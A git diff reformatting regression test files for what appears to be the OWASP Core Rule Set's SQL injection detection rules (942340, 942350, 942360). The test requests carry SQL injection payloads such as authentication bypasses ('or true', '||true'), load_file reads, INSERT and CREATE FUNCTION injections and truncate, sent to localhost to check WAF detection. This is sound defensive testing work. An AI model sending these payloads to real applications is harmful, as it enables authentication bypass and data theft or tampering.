version: HTTP/1.0 + output: + no_log_contains: id "942330" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942340.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942340.yaml index 901d8a697..8483bda92 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942340.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942340.yaml @@ -2,190 +2,177 @@ meta: author: "Christian S.J. Peron, azurit" description: None - enabled: true - name: 942340.yaml tests: - - test_title: 942340-1 + - test_id: 1 desc: "basic SQL authentication bypass attempts 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - # in ( select * from - uri: "/get?var=in%20%28%20select%20%2a%20from" - version: HTTP/1.0 - output: - log_contains: id "942340" - - test_title: 942340-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # in ( select * from + uri: "/get?var=in%20%28%20select%20%2a%20from" + version: HTTP/1.0 + output: + log_contains: id "942340" + - test_id: 2 desc: "SQLite authentication bypass with except select" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - # except \tselect.1,2 - uri: "/get?var=except%20%09select.1%2C2" - version: HTTP/1.0 - output: - log_contains: id "942340" - - test_title: 942340-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # except \tselect.1,2 + uri: "/get?var=except%20%09select.1%2C2" + version: HTTP/1.0 + output: + log_contains: id "942340" + - test_id: 3 desc: "SQLite authentication bypass with except values" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - # except values (1,2) - uri: "/get?var=except%20values(1%2C2)" - version: HTTP/1.0 - output: - log_contains: id "942340" - - test_title: 942340-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # except values (1,2) + uri: "/get?var=except%20values(1%2C2)" + version: HTTP/1.0 + output: + log_contains: id "942340" + - test_id: 4 desc: "true-negative except selecting" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - # except selecting - uri: "/get?var=except%20selecting" - version: HTTP/1.0 - output: - no_log_contains: id "942340" - - test_title: 942340-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # except selecting + uri: "/get?var=except%20selecting" + version: HTTP/1.0 + output: + no_log_contains: id "942340" + - test_id: 5 desc: "basic SQL authentication bypass attempts 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=x'%20or%20array[id]%20is%20not%20null--" - version: HTTP/1.0 - output: - log_contains: id "942340" - - test_title: 942340-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=x'%20or%20array[id]%20is%20not%20null--" + version: HTTP/1.0 + output: + log_contains: id "942340" + - test_id: 6 desc: "basic SQL authentication bypass attempts 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=x'%20or%20email~all(array[email]);analyze--" - version: HTTP/1.0 - output: - log_contains: id "942340" - - test_title: 942340-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=x'%20or%20email~all(array[email]);analyze--" + version: HTTP/1.0 + output: + log_contains: id "942340" + - test_id: 7 desc: "basic SQL authentication bypass attempts 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email='%20and%20email%20not%20similar%20to%20id--" - version: HTTP/1.0 - output: - log_contains: id "942340" - - test_title: 942340-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email='%20and%20email%20not%20similar%20to%20id--" + version: HTTP/1.0 + output: + log_contains: id "942340" + - test_id: 8 desc: "basic SQL authentication bypass attempts 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email='%20or%20true;%20foo" - version: HTTP/1.0 - output: - log_contains: id "942340" - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email='%20or%20false;%20foo" - version: HTTP/1.0 - output: - log_contains: id "942340" - - test_title: 942340-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email='%20or%20true;%20foo" + version: HTTP/1.0 + output: + log_contains: id "942340" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email='%20or%20false;%20foo" + version: HTTP/1.0 + output: + log_contains: id "942340" + - test_id: 9 desc: "basic SQL authentication bypass attempts 3/3 (no whitespace between operator)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email='||true" - version: HTTP/1.0 - output: - log_contains: id "942340" - - test_title: 942340-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email='||true" + version: HTTP/1.0 + output: + log_contains: id "942340" + - test_id: 10 desc: "SQL Auth Bypass FP test (invalid operator without whitespace)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email='ortrue" - version: HTTP/1.0 - output: - no_log_contains: id "942340" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email='ortrue" + version: HTTP/1.0 + output: + no_log_contains: id "942340" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942350.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942350.yaml index 23246f00b..266403140 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942350.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942350.yaml @@ -2,73 +2,67 @@ meta: author: "Christian S.J. Peron, Franziska Bühler, azurit" description: None - enabled: true - name: 942350.yaml tests: - - test_title: 942350-1 + - test_id: 1 desc: "MySQL UDF injection and other data/structure manipulation" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - # ; insert INTO table (word) VALUES('dfsd') - uri: "/get?var=%3bINSERT%20INTO%20table%20%28col%29%20VALUES" - version: HTTP/1.0 - output: - log_contains: id "942350" - - test_title: 942350-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # ; insert INTO table (word) VALUES('dfsd') + uri: "/get?var=%3bINSERT%20INTO%20table%20%28col%29%20VALUES" + version: HTTP/1.0 + output: + log_contains: id "942350" + - test_id: 2 desc: "Fix for FP reported in GitHub issue 1587" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - # ;insertion_424242 - uri: "/get?var=%3Binsertion_424242" - version: HTTP/1.0 - output: - no_log_contains: id "942350" - - test_title: 942350-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # ;insertion_424242 + uri: "/get?var=%3Binsertion_424242" + version: HTTP/1.0 + output: + no_log_contains: id "942350" + - test_id: 3 desc: "MySQL create function injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - # CREATE FUNCTION hello (s CHAR(20)) RETURNS CHAR(50) DETERMINISTIC RETURN CONCAT('Hello, ',s,'!'); - uri: "/get?var=CREATE+FUNCTION+hello+%28s+CHAR%2820%29%29+RETURNS+CHAR%2850%29+DETERMINISTIC+RETURN+CONCAT%28%27Hello%2C+%27%2Cs%2C%27%21%27%29%3B" - version: HTTP/1.0 - output: - log_contains: id "942350" - - test_title: 942350-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # CREATE FUNCTION hello (s CHAR(20)) RETURNS CHAR(50) DETERMINISTIC RETURN CONCAT('Hello, ',s,'!'); + uri: "/get?var=CREATE+FUNCTION+hello+%28s+CHAR%2820%29%29+RETURNS+CHAR%2850%29+DETERMINISTIC+RETURN+CONCAT%28%27Hello%2C+%27%2Cs%2C%27%21%27%29%3B" + version: HTTP/1.0 + output: + log_contains: id "942350" + - test_id: 4 desc: "Status Page Test - MySQL injection with ;truncate[xx" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?test=;truncate[xx" - version: HTTP/1.0 - output: - log_contains: id "942350" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?test=;truncate[xx" + version: HTTP/1.0 + output: + log_contains: id "942350" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942360.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942360.yaml index 860b3b966..3246860f4 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942360.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942360.yaml @@ -2,670 +2,629 @@ meta: author: "Christian S.J. Peron, Christoph Hansen, Franziska Buehler, azurit" description: None - enabled: true - name: 942360.yaml tests: - - test_title: 942360-1 + - test_id: 1 desc: "concatenated basic SQL injection and SQLLFI" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # 23423 as "sdfsdfs" FROM table - data: "var=1234%20AS%20%22foobar%22%20FROM%20tablevar2=whatever" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # 23423 as "sdfsdfs" FROM table + data: "var=1234%20AS%20%22foobar%22%20FROM%20tablevar2=whatever" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_id: 2 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "select Char(" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "select Char(" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_id: 3 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT CHAR(" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT CHAR(" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_id: 4 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT GROUP_CONCAT(" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT GROUP_CONCAT(" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_id: 5 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT group_cOnCat(" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT group_cOnCat(" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_id: 6 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "select load_file(" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "select load_file(" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_id: 7 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "` AS `edit_user_id` from" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "` AS `edit_user_id` from" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_id: 8 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=%60+REGEXP%20" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=%60+REGEXP%20" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_id: 9 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "` AS `OXTIMESTAMP` from" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "` AS `OXTIMESTAMP` from" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_id: 10 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "(load_file(" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "(load_file(" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_id: 11 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "` AS `documentType` FROM" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "` AS `documentType` FROM" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_id: 12 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT load_file(" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT load_file(" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_id: 13 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "6 As\" from" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "6 As\" from" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_id: 14 desc: GH issue 1580 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: ", aside from" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-15 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: ", aside from" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_id: 15 desc: GH issue 1605 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "a=/create" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-16 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "a=/create" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_id: 16 desc: GH issue 1605 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "a=/CREATE TABLE Persons" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-17 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "a=/CREATE TABLE Persons" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_id: 17 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: " Delete (Trashcan)" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-18 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: " Delete (Trashcan)" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_id: 18 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "5desc" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-19 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "5desc" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_id: 19 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "34-delete" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-20 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "34-delete" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_id: 20 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: " update" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-21 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + 